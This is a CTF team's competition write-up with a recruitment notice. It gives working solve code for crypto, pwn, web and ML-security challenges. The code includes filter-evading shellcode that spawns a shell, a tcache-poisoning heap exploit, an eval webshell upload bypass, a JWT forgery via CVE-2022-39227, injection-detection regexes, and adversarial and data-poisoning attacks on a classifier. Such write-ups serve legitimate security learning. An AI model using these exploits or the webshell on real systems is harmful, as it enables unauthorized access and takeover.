· At least one year of CTF experience
· Passionate about cybersecurity and CTF
· No interpersonal issues and no taste for passive-aggressive sniping; willing to contribute and share, eager to improve yourself while helping others
· Able to take part in various competitions when time permits, and willing to follow team management and arrangements
· Winners of various competitions and exceptionally capable players considered case by case
· Not a member of another inter-university team
· Experience requirements may be relaxed for first-year students, case by case
Send your resume to:
· Resume email: [email protected]
crypto-AS(rec)
The AS used in this challenge is just an arithmetic-series summation function; presumably AS(a, b, c) denotes an arithmetic sequence starting at a, ending at b, with c elements in total. The equation we must satisfy is n1**2 + n1 = 2*a*n2**2 with a = 0x149f, and both n1 and n2 must exceed 2**a. Rewriting this as a Pell equation gives (2*n1+1)**2 - 8*a*n2**2 = 1; a fundamental solution can be found via continued fractions, and composing it lets us enumerate solutions until we reach an (n1, n2) meeting the bound.
from sage.all import *
from pwn import *
from hashlib import md5

'''
a = 0x149f
n1**2 + n1 - 2*a*n2**2 = 0
(n1+1/2)**2 - 2*a*n2**2 = 1/4
(2*n1+1)**2 - 8*a*n2**2 = 1
x := 2*n1+1
y := n2
d := 8*a
->
x**2 - d*y**2 = 1
'''

def solve_pell(N, numTry=1000):
    # search the continued-fraction convergents of sqrt(N) for the fundamental solution
    cf = continued_fraction(sqrt(N))
    for i in range(numTry):
        denom = cf.denominator(i)
        numer = cf.numerator(i)
        if numer**2 - N * denom**2 == 1:
            return numer, denom
    return None, None

def func(x0, y0, limit):
    # compose the fundamental solution with itself until x is odd and both values exceed the bound
    x, y = ZZ(x0), ZZ(y0)
    while True:
        x, y = x*x0 + d*y*y0, x*y0 + y*x0
        assert x**2 - d*y**2 == 1
        if x % 2 == 1 and x > limit and y > limit:
            break
    return x, y

a = 0x149f
d = 8*a
limit = 2**a
x0, y0 = solve_pell(d)
x, y = func(x0, y0, limit)
n1 = x // 2
n2 = y

io = remote(*"XXXXXX XXXXX".split())
io.sendlineafter(b'choice:', b'2')
io.sendlineafter(b'n1~', str(n1).encode())
io.sendlineafter(b'n2~', str(n2).encode())
io.interactive()
'''
You get the flag!
b'Verify success!Your username[ADMIN-JM], your password[JM001x!]~'
'''
username, password = b'ADMIN-JM', b'JM001x!'
flag = md5(username + b'+' + password).hexdigest()
print(flag)
# b7133d84297c307a92e70d7727f55cbc
pwn-scsc(heshi)
Exploit the program vulnerability to obtain the data in the info_sec file, and submit the value at row 11, column 2.
When we got the scsc binary, we found it statically compiled with no imported library functions, and the symbol table stripped, so none of the library functions had names.
A reversing trick helps here; there are three ways to recover part of the symbol table:
1. Apply sig files from different versions and see what can be recovered
2. Use BinDiff with different libc builds, matching library functions by machine code to recover their names
3. Use the Finger plugin (requires network access)
In my experience the Finger plugin works best, and since this competition allowed internet access, that is what we used. It identifies more than just libc; without it I would not even have known that C++ libraries were involved (the recovered result was shown in a screenshot here).
The program is an AES-decrypt-and-run shellcode executor that bans some printable characters, so we must encrypt and send shellcode containing none of the filtered characters.
The simplest approach: have a first-stage shellcode set up another read and jump to it, then feed in an ordinary shellcode. The visible-character filter bans "sh" and various 64-bit register operations, so I used 32-bit registers to bypass it easily, invoked sys_read, injected the shellcode, and got a shell.
import sys
from pwn import *
from std_pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

def getProcess(ip, port, name):
    global p
    if len(sys.argv) > 1 and sys.argv[1] == 'r':
        p = remote(ip, port)
        return p
    else:
        p = process(name)
        return p

sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
rc = lambda x: p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
ita = lambda: p.interactive()
slc = lambda: asm(shellcraft.sh())
uu64 = lambda x: u64(x.ljust(8, b' '))
uu32 = lambda x: u32(x.ljust(4, b' '))
# return sl, sd, sa, sla, rc, rl, ru, ita, slc, uu64, uu32

def aes_ecb_encrypt(plaintext):
    print(plaintext)
    # warn if the plaintext contains any filtered byte
    for c in b"0MOyhjlcit1ZkbNRnCHaG":
        if c in plaintext:
            print(f"{chr(c)} in it !")
    # the 16-byte AES key
    key = b"862410c4f93b77b4"
    # build the AES-ECB cipher
    cipher = AES.new(key, AES.MODE_ECB)
    # pad the plaintext and encrypt
    padded_plaintext = pad(plaintext, AES.block_size)
    ciphertext = cipher.encrypt(padded_plaintext)
    # return the raw ciphertext
    return ciphertext

# stage 1: a filter-safe read(0, rsp, 0xff) followed by jmp rsp
shellcode = '''
push rsp
pop rsi
mov edi,0
mov edx,0xff
push rdi
pop rax
syscall
jmp rsp
'''
# 01ayhcjitkbn MOlZNRCHG

p = getProcess("47.117.42.74", 32846, './scsc')
context(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-h'])
elf = ELF("./scsc")
gdba()
payload = asm(shellcode)
sa("magic data:", aes_ecb_encrypt(asm(shellcode)))
# stage 2: ordinary /bin/sh shellcode, read in by stage 1
sl(asm(shellcraft.sh()))
ita()
pwn-boh(duck0123)
Exploit the program vulnerability to obtain the data in the info_sec file, and submit the value at row 8, column 2.
#coding:utf-8
import sys
from pwn import *

context.log_level='debug'
io=process('./boh')
#io=remote('xxxx',xxx)
libc=ELF('./libc-2.31.so')

def choice(a):
    io.sendlineafter('>>>>>> ',str(a))
def add(a):
    choice(1)
    io.sendlineafter('storage:',str(a))
def edit(a,b):
    choice(4)
    io.sendlineafter(':',str(a))
    io.sendafter(':',b)
def show(a):
    choice(3)
    io.sendlineafter('data: ',str(a))
def delete(a):
    choice(2)
    io.sendlineafter('space: \n',str(a))

add(0x500)  # chunk 0: large enough to land in the unsorted bin when freed
add(0xf0)   # chunk 1
add(0xf0)   # chunk 2
delete(0)
show(0)     # UAF read: leak a libc pointer from the unsorted-bin fd
leak=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')
libc_base=(leak-libc.sym['_IO_2_1_stdin_'])&0xfffffffffffff000
libc.address=libc_base
system_addr=libc.sym['system']
free_hook_addr=libc.sym['__free_hook']
delete(1)
edit(1,'\x00'*0x10+'\n')            # clear the tcache key so the chunk can be freed again
delete(1)                           # double free: chunk 1 is in the tcache twice
edit(1,p64(free_hook_addr)+'\n')    # poison the tcache fd to point at __free_hook
add(0xf0)   # chunk 3
add(0xf0)   # chunk 4: allocated on top of __free_hook
edit(4,p64(system_addr)+'\n')       # __free_hook = system
edit(2,'/bin/sh\x00\n')
delete(2)                           # free("/bin/sh") -> system("/bin/sh")
io.interactive()
crypto-RSSA(rec)
A fintech company designed a new data-encryption scheme to protect users' transaction information and spread risk. The scheme is a modified RSA algorithm incorporating a certain number-theoretic problem. While testing the scheme, a security researcher found a potential vulnerability that could leak the key. Given a piece of encrypted data and the related encryption parameters, analyze them, recover the credit-card number and expiry date, and submit md5(card-exp_date); e.g. for card:123 and exp_date:11-11, submit ed5f4a22d5fdc71d97e36a32bb094fae.
The first part is a plain RSA scenario leaking the high bits of p; a Coppersmith attack breaks the RSA and yields a hint that completes the parameters for the second part.
The second part is a standard ahssp (hidden subset sum) instance; following the paper https://eprint.iacr.org/2020/461.pdf, we run the orthogonal-lattice attack to recover the small matrix and then solve a matrix equation to obtain s.
from sage.all import *
from Crypto.Util.number import *
from hashlib import md5
a = 0xb0ee0627166579753f354ced7cdb6701a5ebbfaec3cd6af76decc33f95a765bd7e5f758e2076c42a76f5af867152757b97242034693f309973ffdebe4a5ce3dd822260dfa8a8d51f9aac7550474a3a4fe37ecea6cdc23b0cbba5aa6d0d93e9b10000000000000000000000000000000000000000000000000000000000000000
n = 0x6b9f0bf43d3e9b3278d52b3cfaafadf9449048f8297fedf8f8909a030156a23c68552b5379adbf32fd9584aa42f694c8227d275f40391c7872400eda97c2b79f8349af6492c7b6ac12bae303cee1eb9b6059e5891a6535ca8310e9ba145b7b4d403d8e666e5a55a94e5f7dabe22b80032e936233d7a1f0e96b95aeb4249b8ea34ef8bf422ce9f725844478ee15b739dd70cc6e2c0bd0cb24d7d14baf66c5aca2023c24339d3b90eecb0e2568c148d438a5ce84270ce11159e3aa4d48ac8b2185c2fe8cb328e8f80602c9d7ae49799538154d325700349bb7cd2fb694fb9f8cbcf2ebced8f6c29a05c64aa78a036416c28e6e7b937a371c98feed2d826ca9ed63
c = 0x4dba2f194b97d4dac89548c035bf18d708fb9edfd6b7706e6d7871c6129931cde88718bdcbd1e8410f1e7a4c709bdf9d31572ee371816e1d11e15e491d843a7277684202bc45e23f9f1b2e3a808bde94343a47a6a22b339aa651568ff55994260039defd790c0eb0abcf90730ecf3e097316ca87e607974544866a54d23aaaf2d089e346a68437a55afc4750b9ea1d7efcb7a6fd55c694a168f186531f0e8abb2dee73ff50ebeb2a39e1e9842013dc410e09987783cdd8e234a55388fffc025b1fe3b4036d6181ac8e6ec4d9c0822c012ac861b242b2c94433209369d0f271110d007202118e566646940f12179ee05b4e1b3c1871f09a4dbfe381d625c1166a
R, x = PolynomialRing(Zmod(n), 'x').objgen()
f = x + a
ans = f.small_roots(X=2**256, beta=0.4, epsilon=0.03)
p = a + int(ans[0])
q = n // p
d = inverse_mod(0x10001, n-p-q+1)
m = pow(c, d, n)
print(long_to_bytes(m))
# Ohhhh~You get hint!!!Keep in mind~[n = 45]
p = 124244317712525284357780325725633529145442802066864254394159544562504647929416536939991846331828441162268585119609117368160118503713080527398014673283356965061627021101171796247132206953865749974908694380616197458412945773485258798886381229108254245680238940045643980836534956149948805469173754582822299450399
e = XXXXXXX
h = XXXXXXX
n, m = 45, 195
K = 2**1024
L = block_matrix(ZZ, [
[1, K*matrix(h).T, K*matrix(e).T],
[0, K*p, 0],
[0, 0, K*p]
]).LLL()
L = block_matrix(ZZ, [
[1, K*L[:m-n,:m].T]
]).LLL()
L = L[:n,:m]
def check(v):
    return set(v.list()) == {0, 1} or set(v.list()) == {-1, 0}

Lv = [v for v in L if check(v)]
for vi in Lv:
    for vj in L:
        v = vi + vj
        if check(v) and v not in Lv:
            Lv.append(vector(list(map(abs, v))))
        v = vi - vj
        if check(v) and v not in Lv:
            Lv.append(vector(list(map(abs, v))))
A = block_matrix(GF(p), [
[matrix(Lv)],
[-matrix(e)]
])
b = vector(h)
ss = A.solve_left(b)
print(ss)
flag = long_to_bytes(int(ss[-1]))
print(flag)
# card:4111111111111123,exp_date:2025-12
card = b'4111111111111123'
exp_date = b'2025-12'
flag = md5(card + b'-' + exp_date).hexdigest()
print(flag)
# a01f461a6ca2936342b269b55e8de03e
ez_upload(yiyi)
A server stores the RSA key file used for data encryption. During site maintenance, the administrator failed to patch a vulnerable test site in time. Submit the path where the RSA key is stored (format: if the file's path is /var/www, submit /var/www).
phtml bypasses the filename restriction (the file contents are also checked and may not contain "PHP"; after uploading, the .htaccess shows that php3 also works).
Connect with AntSword (蚁剑).
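For reference, a minimal sketch of this bypass; the upload URL, form field name, and webshell parameter are assumptions. The short echo tag keeps the literal string "php" out of the file body, and the .php3 extension dodges the filename blacklist:

import requests

# hypothetical upload endpoint and form field name
url = "http://target/upload.php"
# short echo tag: executes without the literal string "php" in the file content
webshell = b"<?= @eval($_POST['x']); ?>"

files = {"file": ("shell.php3", webshell, "image/jpeg")}
r = requests.post(url, files=files)
print(r.status_code, r.text)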
API authentication (xuanSAMA, chleynx)
Appending a . to the path bypassed the middleware's authorization check on the /get_jwt route.
That yields a guest JWT.
Judging from the responses, we guessed python-jwt and tried forging the JWT via CVE-2022-39227.
# imports as used in the public CVE-2022-39227 PoC (assumed here)
from json import loads, dumps
from jwcrypto.common import base64url_decode, base64url_encode

def topic(name):
    topic = "eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDMzMjAzMDMsImdyb3VwaW5nIjoiZ3Vlc3QiLCJpYXQiOjE3NDMzMTY3MDMsImp0aSI6IkJVZVd4VEJUUnNmcnRPM0ZsZEhZUWciLCJuYmYiOjE3NDMzMTY3MDMsInVzZXIiOiJjaW1lciJ9.Y5lUuRh94_66y7kCcOoYeHNjp_a4fhjEU1XgIbx9XYKOXeSGF90NJEB56DOGOlRRK3XfHsDQKbk-jqp_RE20j0i20q-Uw6Ny-YZLNYBGdmw9TwesuMMtmxpEErLgiSrIPj8NTIEvUAbZ6HUpSVfAEZD-bG2lZqseMDptz9FvulbTYxRmRkS_dAN63efbB4RMSmqHqptUtRHxDzI1dPAqJM18WFfIGiok1-aIwjilrNIC-UDq-DqRkGoYTYPMphq0B7k5RSwZvYmO_nvETkYRJ8lYccP5-7fWgIqZM2WD46QY8kQ5s0yVpmwuCcaFKDmKXeSxIFJM_GR1b2uXB-34jw"
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    # print(parsed_payload)
    parsed_payload["grouping"] = "admincimer"
    parsed_payload["user"] = "admincimer"
    # print(dumps(parsed_payload, separators=(',', ':')))
    fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))
    print(fake_payload)
    return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"} '
Running it returns the sensitive information.
Answer:
14573688064
Model Security
Data Preprocessing Security
Data Labeling and Integrity Verification (Cain)
For the raw user-review data from the online group-buying platform, scrape the user reviews, label each with a sentiment (positive/negative), and generate an MD5 signature from the user ID, username, and phone number to verify integrity. Submit the processed submit_1.csv according to the attached template and task book for scoring.
We first tried a lot of models such as FastText, SnowNLP, and BERT, but the pretrained ones all performed poorly. We found a JD e-commerce dataset, but time was running short, so in the end we just used ChatGPT-3.5.
import requests
from bs4 import BeautifulSoup
import torch
from transformers import BertTokenizer, BertForSequenceClassification
from hashlib import md5
from tqdm import trange

openai_endpoint = ""  # redacted in the original
openai_api_key = ""   # redacted in the original
headers = {
    "Authorization": f"Bearer {openai_api_key}",
    "Content-Type": "application/json"
}
data = {
    "model": "gpt-3.5-turbo",
    "messages": [
        {
            "role": "system",
            "content": """你是一个情感分析专家,你的职责是分析用户对商品的评价,并给出情感分析结果,请直接返回数字,0为负面,1为正面,不要返回任何其他内容"""
        },
        {
            "role": "user",
            "content": ""
        }
    ]
}

def classify_text(text):
    data["messages"][1]["content"] = text
    response = requests.post(openai_endpoint, headers=headers, json=data)
    return response.json()["choices"][0]["message"]["content"]

ans = []
for i in trange(1, 501):
    url = f"http://47.117.190.73:32823/index.php?controller=product&action=detail&id={i}"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")
    reviews = []
    review_items = soup.find_all("div", class_="review-item")
    for item in review_items:
        user_id = item.find("span", class_="user-id").text.replace("用户ID:", "")
        username = item.find("span", class_="reviewer-name").text.replace("用户名:", "")
        phone = item.find("span", class_="reviewer-phone").text.replace("联系电话:", "")
        content = item.find("div", class_="review-content").text.strip()
        review_info = {
            "user_id": user_id,
            "username": username,
            "phone": phone,
            "content": content.replace(" ", "")
        }
        reviews.append(review_info)
    for review in reviews:
        c = classify_text(review['content'])
        try:
            c = int(c)
        except:
            print(c, review['content'])
            c = 0
        ans.append([review['user_id'], c, md5((review['user_id'] + review['username'] + review['phone']).encode()).hexdigest()])

sorted_ans = sorted(ans, key=lambda x: int(x[0]))
with open('flag.csv', 'w', newline='') as csvfile:
    csvfile.write("user_id,label,signature\n")
    for item in sorted_ans:
        csvfile.write(f"{item[0]},{item[1]},{item[2]}\n")
Data Cleaning and Feature Engineering (chleynx, Cain)
For the product data from the online group-buying platform, scrape it and then perform data cleaning (handle anomalous sales figures) and feature engineering (extract category IDs, count reviews). Submit the processed submit_2.csv according to the attached template and task book for scoring.
Exp (chleynx)
import requests
from bs4 import BeautifulSoup
import csv
import re
import time
import random

# base URL
BASE_URL = "http://47.117.190.214:32920"

# category keyword map
category_keywords = {
    1: ["手机", "phone", "华为", "iphone", "xiaomi", "苹果", "三星", "oppo", "vivo", "智能机", "联想", "nokia", "戴尔", "lenovo"],
    2: ["母婴", "奶瓶", "尿布", "婴儿", "宝宝", "玩具", "奶粉", "童装", "儿童"],
    3: ["家居", "家具", "沙发", "床", "桌子", "椅子", "茶几", "柜子", "装饰"],
    4: ["书籍", "小说", "文学", "教材", "杂志", "图书", "书", "作者", "阅读"],
    5: ["蔬菜", "西红柿", "黄瓜", "胡萝卜", "白菜", "花菜", "韭菜", "青菜", "菠菜"],
    6: ["厨房用具", "锅", "碗", "筷子", "刀", "砧板", "铲", "勺"],
    7: ["办公", "打印机", "复印机", "笔", "纸", "文件夹", "办公室"],
    8: ["水果", "苹果", "香蕉", "梨", "橙子", "草莓", "芒果", "葡萄", "樱桃", "桃"],
    9: ["宠物", "猫", "狗", "鱼", "宠物", "饲料", "猫粮", "狗粮", "宠物用品"],
    10: ["运动", "健身", "足球", "篮球", "网球", "跑步", "游泳", "体育"],
    11: ["热水器", "恒温", "速热", "防干烧", "卫生间", "洗浴"],
    12: ["彩妆", "口红", "粉底", "眼影", "眼线", "化妆", "美妆", "腮红"],
    13: ["保健品", "维生素", "蛋白粉", "营养", "保健", "补充剂"],
    14: ["酒水", "啤酒", "红酒", "白酒", "葡萄酒", "威士忌", "伏特加"],
    15: ["玩具乐器", "玩具", "琴", "吉他", "钢琴", "电子琴", "鼓", "乐器"],
    16: ["汽车", "车", "轮胎", "方向盘", "座椅", "汽油", "柴油"],
    17: ["床上用品", "床单", "被子", "枕头", "床垫", "床笠", "被套", "枕套"],
    18: ["洗护用品", "洗发水", "沐浴露", "洗面奶", "护肤品", "防晒", "洁面", "面膜", "护发素", "洗发"],
    19: ["五金", "工具", "螺丝", "螺母", "扳手", "锤子"],
    20: ["户外", "露营", "帐篷", "睡袋", "登山", "徒步", "旅行"],
    21: ["珠宝", "项链", "戒指", "手镯", "耳环", "金", "银", "玉"],
    22: ["医疗器械", "血压计", "体温计", "血糖仪", "听诊器", "轮椅"],
    23: ["花卉园艺", "花", "植物", "盆栽", "花盆", "园艺", "种子", "花卉"],
    24: ["游戏", "电子游戏", "游戏机", "游戏手柄", "游戏光碟"],
    25: ["园艺", "园艺工具", "花园", "种植", "培育", "修剪", "盆栽"]
}

# decide a product's category
def get_category_id(product_name):
    product_name = product_name.lower()
    scores = {cat_id: 0 for cat_id in range(1, 26)}
    # score every category by keyword matches
    for cat_id, keywords in category_keywords.items():
        for keyword in keywords:
            if keyword.lower() in product_name:
                scores[cat_id] += 1
    # special-case rules
    if "热水器" in product_name:
        return 11
    if "洗发" in product_name or "护发" in product_name:
        return 18
    if "水果" in product_name or "草莓" in product_name or "香蕉" in product_name:
        return 8
    if "书" in product_name and len(product_name) > 10:
        return 4
    if "phone" in product_name.lower() or "手机" in product_name:
        return 1
    # return the highest-scoring category
    max_score = max(scores.values())
    if max_score > 0:
        for cat_id, score in scores.items():
            if score == max_score:
                return cat_id
    # no clear match: fall back to a few heuristics
    if "手机" in product_name or "phone" in product_name.lower():
        return 1
    elif "婴" in product_name or "童" in product_name:
        return 2
    elif "书" in product_name or "文学" in product_name:
        return 4
    elif "蔬菜" in product_name:
        return 5
    elif "水果" in product_name:
        return 8
    elif "热水器" in product_name:
        return 11
    elif "彩妆" in product_name or "化妆" in product_name:
        return 12
    # default (should rarely be hit)
    return product_name

# fetch the product list pages
def get_product_list():
    products = []
    page = 1
    max_pages = 84  # from the pagination info in the page HTML
    while page <= max_pages:
        url = f"{BASE_URL}/index.php?controller=home&action=index&page={page}"
        try:
            response = requests.get(url)
            soup = BeautifulSoup(response.text, 'html.parser')
            # extract product info
            product_cards = soup.select('.product-card')
            if not product_cards:
                break
            for card in product_cards:
                product_id = card.get('data-id')
                if not product_id:
                    product_id = card.select_one('.product-id').text.strip().replace('商品ID: ', '')
                product_name = card.select_one('.product-name').text.strip()
                # extract sales
                sales_text = card.select_one('.product-sales').text.strip().replace('月销量: ', '').replace('件', '')
                try:
                    sales = int(sales_text)
                    if sales < 0:  # clamp negative sales figures
                        sales = 0
                except (ValueError, TypeError):
                    sales = 0  # value not convertible to an integer
                # decide the category ID
                category_id = get_category_id(product_name)
                products.append({
                    'product_id': int(product_id),
                    'product_name': product_name,
                    'sales': sales,
                    'category_id': category_id,
                    'reviews_number': 0  # filled in later
                })
            print(f"Processed page {page}, got {len(product_cards)} products")
            page += 1
            # delay here to avoid hammering the server
        except Exception as e:
            print(f"Error on page {page}: {e}")
            # on error, retry the request
            continue
    # sort by product ID
    products.sort(key=lambda x: int(x['product_id']))
    return products

# fetch the review count for one product
def get_reviews_count(product_id):
    url = f"{BASE_URL}/index.php?controller=product&action=detail&id={product_id}"
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, 'html.parser')
        # find the review items
        review_items = soup.select('.review-item')
        return len(review_items)
    except Exception as e:
        print(f"Error fetching review count for product {product_id}: {e}")
        return 0

# main
def main():
    print("Scraping product data...")
    products = get_product_list()
    print(f"Got {len(products)} products in total")
    print("Fetching review counts...")
    # fetch review counts
    total_reviews = 0
    products_with_reviews = 0
    for i, product in enumerate(products):
        reviews_count = get_reviews_count(product['product_id'])
        products[i]['reviews_number'] = reviews_count
        # accumulate review statistics
        total_reviews += reviews_count
        if reviews_count > 0:
            products_with_reviews += 1
        if (i+1) % 10 == 0:
            print(f"Processed review counts for {i+1}/{len(products)} products")
        # delay here to avoid hammering the server
    # print review statistics
    print(f"\n===== Review statistics =====")
    print(f"Total reviews: {total_reviews}")
    print(f"Products with reviews: {products_with_reviews}")
    print(f"Average reviews per product: {total_reviews / len(products):.2f}")
    # make sure product IDs 1..500 all exist; fill in any that are missing
    product_ids = set(p['product_id'] for p in products)
    for pid in range(1, 501):
        if pid not in product_ids:
            products.append({
                'product_id': pid,
                'product_name': '',
                'sales': 0,
                'category_id': 0,  # default category
                'reviews_number': 0
            })
    # sort again so output is in ascending product-ID order
    products.sort(key=lambda x: int(x['product_id']))
    # write the data to a CSV file
    with open('submit_222.csv', 'w', encoding='utf-8', newline='') as csvfile:
        fieldnames = ['product_id', 'sales', 'category_id', 'reviews_number']
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for product in products:
            writer.writerow({
                'product_id': product['product_id'],
                'sales': product['sales'],
                'category_id': product['category_id'],
                'reviews_number': product['reviews_number']
            })
    print("Data written to submit_2.csv")

if __name__ == "__main__":
    main()
Adding the final manual fixes (shown in a screenshot here) gave a full score.
Cain: The approach above still takes way too much manual fiddling. Is there a simpler yet stronger exploit? Yes, brother, there is.
The classification was too tedious, so I just called an LLM: give it a prompt and let it output the category. GPT-3.5 isn't expensive anyway.
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import json
from tqdm import tqdm

openai_endpoint = ""
openai_api_key = ""
headers = {
    "Authorization": f"Bearer {openai_api_key}",
    "Content-Type": "application/json"
}
data = {
    "model": "gpt-3.5-turbo",
    "messages": [
        {
            "role": "system",
            "content": """你是一个商品分类助手,你的职责是帮助用户完成商品分类,下面是你的商品分类清单,你需要将客户告诉你的商品分类到对应的分类中,
1->手机, 2->母婴用品, 3->家居, 4->书籍, 5->蔬菜, 6->厨房用具, 7->办公, 8->水果, 9->宠物, 10->运动, 11->热水器, 12->彩妆, 13->保健品, 14->酒水, 15->玩具乐器, 16->汽车, 17->床上用品, 18->洗护用品, 19->五金, 20->户外, 21->珠宝, 22->医疗器械, 23->花卉园艺, 24->游戏, 25->园艺
注意!请直接返回数字,不要返回任何其他内容"""
        },
        {
            "role": "user",
            "content": ""
        }
    ]
}

def classify_product(product_description):
    data["messages"][1]["content"] = product_description
    response = requests.post(openai_endpoint, headers=headers, data=json.dumps(data))
    return response.json()["choices"][0]["message"]["content"]

flag = open("flag.csv", "w")
flag.write("product_id,sales,category_id,reviews_number\n")
for i in tqdm(range(1, 501)):
    url = f"http://47.117.190.73:32823/index.php?controller=product&action=detail&id={i}"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")
    product_description = ""
    description_element = soup.select_one(".product-description p")
    if description_element:
        product_description = description_element.text.strip()
    monthly_sales = 0
    sales_element = soup.select_one("#productSales")
    if sales_element:
        try:
            monthly_sales = int(sales_element.text.strip())
        except ValueError:
            pass
    review_items = soup.find_all("div", class_="review-item")
    review_count = len(review_items)
    # print(classify_product(product_description))
    c = classify_product(product_description)
    try:
        c = int(c)
    except:
        c = c.split("->")[0]
    flag.write(f"{i},{0 if monthly_sales < 0 or monthly_sales is None else monthly_sales},{c},{review_count}\n")
flag.close()
Privacy Protection and Malicious-Code Detection
For the user data from the online group-buying platform, scrape the data and then perform data masking and malicious-code detection. In the masking step, the phone numbers must be masked and replaced according to the given rules. In the detection step, the review user_agent strings must be checked for SQL injection / XSS / command execution and other malicious code. Submit the processed submit_3.csv according to the attached template and task book for scoring.
My code? Who deleted my code?
The overall approach is much the same as above; a rough reconstruction is sketched below.
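Since the original script was lost, here is a minimal sketch of the same idea. The masking rule (keep the first 3 and last 4 digits) and the detection signatures are assumptions based on the task description, not the original code:

import re

# assumed masking rule: keep the first 3 and last 4 digits, star out the middle
def mask_phone(phone):
    return re.sub(r'(\d{3})\d{4}(\d{4})', r'\1****\2', phone)

# crude signatures for SQLi / XSS / command execution in a user_agent string
MALICIOUS_PATTERNS = [
    r"(union\s+select|or\s+1\s*=\s*1|sleep\s*\()",   # SQL injection
    r"(<script|onerror\s*=|javascript:)",            # XSS
    r"(;\s*(cat|ls|id)\b|\$\(|`)",                   # command execution
]

def is_malicious(user_agent):
    ua = user_agent.lower()
    return int(any(re.search(p, ua) for p in MALICIOUS_PATTERNS))

print(mask_phone("13221367890"))               # 132****7890
print(is_malicious("Mozilla/5.0' OR 1=1 --"))  # 1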
Adversarial Samples and Data Poisoning
Adversarial Sample Attack (Cain)
Analyze the pretrained clothing-review sentiment model file and append a minimal perturbation text (an adversarial suffix) to each original review so that the model's sentiment prediction on the modified review flips (positive to negative, or negative to positive), maximizing the model's prediction error rate.
Your task: for the 1000 original texts in the provided csv file, generate the same number of adversarial samples, each appending at most 5 characters to the original text so that the model's predicted label flips (0→1 or 1→0). Collect the best adversarial samples into submit.csv and submit it to the platform; scoring is by label-flip rate.
We used a GCG-style search to find the adversarial suffixes, and it worked fairly well. Time ran out on the code side and I could not untangle the correspondences, so it is rather verbose.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
import joblib
import numpy as np

sentiment_model = joblib.load('sentiment_model.pkl')
tfidf_vectorizer = joblib.load('tfidf_vectorizer.pkl')
file = open('data.csv', mode='r', encoding='utf-8')
flag = open('flag.csv', mode='w', encoding='utf-8')
datas = file.readlines()[1:]
flag.write('sample_id,adversarial_examples\n')

for i, data in enumerate(datas):
    text = data.split(',')[1]
    original_prediction = int(data.split(',')[-1])
    if original_prediction == 0:
        vocab = tfidf_vectorizer.get_feature_names_out()
        max_iterations = 50
        suffix_tokens = []
        current_text = text
        for iteration in range(max_iterations):
            best_token = None
            best_score = float('-inf')
            # greedy coordinate search: try a random quarter of the vocabulary
            for token in np.random.choice(vocab, size=len(vocab)//4, replace=True):
                candidate_text = current_text + " " + token
                candidate_vector = tfidf_vectorizer.transform([candidate_text])
                candidate_score = sentiment_model.predict_proba(candidate_vector)[0][1]
                if candidate_score > best_score:
                    best_score = candidate_score
                    best_token = token
            if best_token:
                suffix_tokens.append(" " + best_token)
                current_text = current_text + " " + best_token
                # check whether the prediction flipped
                current_vector = tfidf_vectorizer.transform([current_text])
                current_prediction = sentiment_model.predict(current_vector)[0]
                if current_prediction != original_prediction:
                    print(f"Prediction flipped after iteration {iteration+1}")
                    break
            else:
                print("No token found that flips the prediction")
                break
        # report results
        adversarial_text = current_text
        print(f"Appended suffix: {''.join(suffix_tokens)}")
        print(f"Adversarial sample: {adversarial_text}")
        # verify the final prediction
        final_vector = tfidf_vectorizer.transform([adversarial_text])
        final_prediction = sentiment_model.predict(final_vector)
        print(f"Final prediction: {final_prediction[0]}")
        print(f"Original prediction: {original_prediction}")
        print(f'-------------------{i}---------------------')
        flag.write(f"{data.split(',')[0]},{''.join(suffix_tokens)}\n")
    if original_prediction == 1:
        vocab = tfidf_vectorizer.get_feature_names_out()
        max_iterations = 50
        suffix_tokens = []
        current_text = text
        for iteration in range(max_iterations):
            best_token = None
            best_score = float('inf') if original_prediction == 1 else float('-inf')
            for token in np.random.choice(vocab, size=len(vocab)//4, replace=False):
                candidate_text = current_text + " " + token
                candidate_vector = tfidf_vectorizer.transform([candidate_text])
                candidate_score = sentiment_model.predict_proba(candidate_vector)[0][1]
                if (original_prediction == 1 and candidate_score < best_score) or \
                   (original_prediction == 0 and candidate_score > best_score):
                    best_score = candidate_score
                    best_token = token
            if best_token:
                suffix_tokens.append(" " + best_token)
                current_text = current_text + " " + best_token
                # check whether the prediction flipped
                current_vector = tfidf_vectorizer.transform([current_text])
                current_prediction = sentiment_model.predict(current_vector)[0]
                if current_prediction != original_prediction:
                    print(f"Prediction flipped after iteration {iteration+1}")
                    break
            else:
                print("No token found that flips the prediction")
                break
        # report results
        adversarial_text = current_text
        print(f"Appended suffix: {''.join(suffix_tokens)}")
        print(f"Adversarial sample: {adversarial_text}")
        # verify the final prediction
        final_vector = tfidf_vectorizer.transform([adversarial_text])
        final_prediction = sentiment_model.predict(final_vector)
        print(f"Final prediction: {final_prediction[0]}")
        print(f"Original prediction: {original_prediction}")
        print(f'-------------------{i}---------------------')
        flag.write(f"{data.split(',')[0]},{''.join(suffix_tokens)}\n")
Data Poisoning Attack (Cain)
With a capped amount of poisoned data, craft and inject carefully designed poisoning samples, retrain the clothing-review sentiment model, and maximize the label-flip rate on the key validation set.
Your task: using the provided online poisoning/training platform, craft and upload at most 100 poisoned samples (each at most 20 characters), inject them into the original training data, and tune the training hyperparameters so that the final model flips as many sentiment labels as possible on the 1000 validation texts. Export and submit the trained model .zip to the platform; scoring is by label-flip rate.
